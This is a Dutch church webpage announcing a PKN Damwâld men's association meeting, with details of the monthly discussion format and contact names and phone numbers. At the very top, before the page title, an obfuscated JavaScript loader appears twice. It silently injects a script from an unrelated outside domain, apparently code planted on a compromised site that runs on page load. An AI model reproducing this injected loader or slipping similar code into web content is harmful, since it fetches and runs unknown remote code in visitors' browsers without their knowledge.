;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Welkom bij de Mannenvereniging! - PKN Damwâld
1 december 2022
15:00 t/m 16:30
de Ontmoeting
Welkom bij de Mannenvereniging!

Misschien is uw eerste gedachte bij het lezen van bovenstaand opschrift: ‘Mannenvereniging, bestaat die nog bij onze kerk?”. Het antwoord is heel eenvoudig, ja die bestaat nog ! Misschien denkt u ook wel: Het zal wel saai of ouderwets zijn … Beide niet! Niet saai en zeker niet ‘ouderwets’!
Nu u dit weet bent u natuurlijk ook benieuwd naar het hoe en wat van deze mannenvereniging. De mannenvereniging gaat uit van onze beide PKN-kerken, maar iedereen is van harte welkom. In principe wordt de mannenvereniging één keer per maand gehouden en wel op de eerste donderdag van elke maand van 15.00 uur tot plm. 16.30 uur in één van de zalen van De Ontmoeting.

Tijdens de vergadering wordt er gesproken over een onderwerp dat te maken heeft met ons geloof en/of met de kerk. De ene keer wordt bijvoorbeeld een preek besproken (dit hoeft niet persé een preek te zijn van onze eigen predikant), de andere keer wordt een artikel uit een (dag-)blad dat direct of indirect betrekking heeft op geloofs- of kerkelijke aangelegenheden aan de orde gesteld. De leden dragen zelf de te bespreken onderwerpen aan. De informatie over het te bespreken onderwerp krijgen de leden vroegtijdig. Tijdens de vergaderingen is er ruim voldoende gelegenheid tot gesprek. U bent van harte welkom op de eerstvolgende vergadering op 1 december.

En u weet: Net stinne, hinne!

Als u vooraf meer informatie wilt kunt u contact opnemen met P. Elsma (tel 422817) of met W. Rozendal (tel 423712).

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld